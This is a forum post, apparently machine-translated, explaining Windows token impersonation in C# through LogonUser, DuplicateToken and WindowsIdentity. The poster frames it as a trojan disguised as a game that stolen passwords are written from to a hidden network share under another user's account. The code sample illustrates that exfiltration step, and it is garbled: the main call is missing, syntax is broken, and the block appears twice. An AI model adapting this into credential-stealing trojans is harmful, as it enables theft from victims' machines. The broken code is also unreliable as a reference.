Impersonation with C #

Discussion in 'C # j # vb.net (.NET languages)' started by leflacon47, Mar 26, 2018.

  1. leflacon47

    leflacon47 New Member

    I returned to Black Hat ... I guess I already told you. When I need it in the system I want to scan, I wanted to share it here.

    Impersonation - is to temporarily assume the authority of a different user. For example, if you have a program, the program must be run by a normal user, but when running, you must have a different user privilege for a single operation ... Then we use impersonation.

    I give an example; The trojan you wrote looks like a normal game, but it actually gets information from the backplane. The information is also expected to be dumped to the \\ server \ osmanDudugunGizliKlasoru folder, which belongs to your user osman.duduk account in the same network, which is not visible to other users.

    Then what do we do? First we examine the WindowsIdentity class in System.Security.Principal. This class imitates every user we want when only an "impersonation" token is given and he does all the work.

    Where will we buy e token? advapi.dll We examine the possibilities that the windows DLL provides us. The list is nice .. LogonUser gave us a token. But this is not a "login" token, not an "impersonation". Windows is very sensitive in this regard. But thank goodness we also have a DuplicateToken function, which could copy such a login token as an impersonation token.

    So let's get started;

    Note: Learn how to pin master. I will not copy LogonUser and DuplicateToken's signatures here; pinvoke.net:

    // Define our tokens.
    IntPtr loginTokeni = IntPtr.Zero, impersonationTokeni = IntPtr.Zero;
    //Let's try. Unknown errors may occur.
    try {
    // returns an external value of 0 if it can login. It then returns an external value of 0 if it can duplicate it.
    // The 2 values we use in LogonUser allow us to open an interactive session. The second 0
    tells us that the
    login system provider is // default system. For other types of sessions you can look at pinvoke.net or msdn. // DuplicateToken's parameter tells us to clone this token as an impersonation token.
    (loginTokeni, 2, ref impersonationTokeni)! = 0 && DuplicateToken (loginTokeni, 2, ref impersonationTokeni)! = 0 (& 0) {
    // We immediately create a WindowsIdentity from the impersonationToken we created. We give this identity an impersonate
    // order and save it as an impersonation.
    System.Security.Principal.WindowsImpersonationContext impersonation = new new System.Security.Principal.WindowsIdentity (impersonationTokeni) .Impersonate ();
    // We do the operations we want at this point. For example;
    System.IO.File.WriteAllText ("\\\\ server \\ onlyOsmaninGorduguKlasor \\ foundGuarantees.txt", <we found passwords>);
    // Then we leave the impersonation.
    impersonation.undo ();
    }
    } finally {
    // Always close token handles we use is good.
    // The function I use is a pinvoke, from kernel32.dll ...
    if (loginTokeni! = IntPtr.Zero) CloseHandle (loginTokeni);
    if (impersonationTokeni! = IntPtr.Zero) CloseHandle (impersonationTokeni);
    }
    Code:
    // Define our tokens.
    IntPtr loginTokeni = IntPtr.Zero, impersonationTokeni = IntPtr.Zero;
    //Let's try. Unknown errors may occur.
    try {
        // returns an external value of 0 if it can login. It then returns an external value of 0 if it can duplicate it.
        // The 2 values we use in LogonUser allow us to open an interactive session. The second 0
        tells us that the
    login system provider is // default system. For other types of sessions you can look at pinvoke.net or msdn.     // DuplicateToken's parameter tells us to clone this token as an impersonation token.
        (loginTokeni, 2, ref impersonationTokeni)! = 0 && DuplicateToken (loginTokeni, 2, ref impersonationTokeni)! = 0 (& 0) {
            // We immediately create a WindowsIdentity from the impersonationToken we created. We give this identity an impersonate
            // order and save it as an impersonation.
            System.Security.Principal.WindowsImpersonationContext impersonation = new new System.Security.Principal.WindowsIdentity (impersonationTokeni) .Impersonate ();
            // We do the operations we want at this point. For example;
            System.IO.File.WriteAllText ("\\\\ server \\ onlyOsmaninGorduguKlasor \\ foundGuarantees.txt", <we found passwords>);
            // Then we leave the impersonation.
            impersonation.undo ();
        }
    } finally {
        // Always close token handles we use is good.
        // The function I use is a pinvoke, from kernel32.dll ...
        if (loginTokeni! = IntPtr.Zero) CloseHandle (loginTokeni);
        if (impersonationTokeni! = IntPtr.Zero) CloseHandle (impersonationTokeni);
    }
    That's it. Good luck with.
     

Share This Page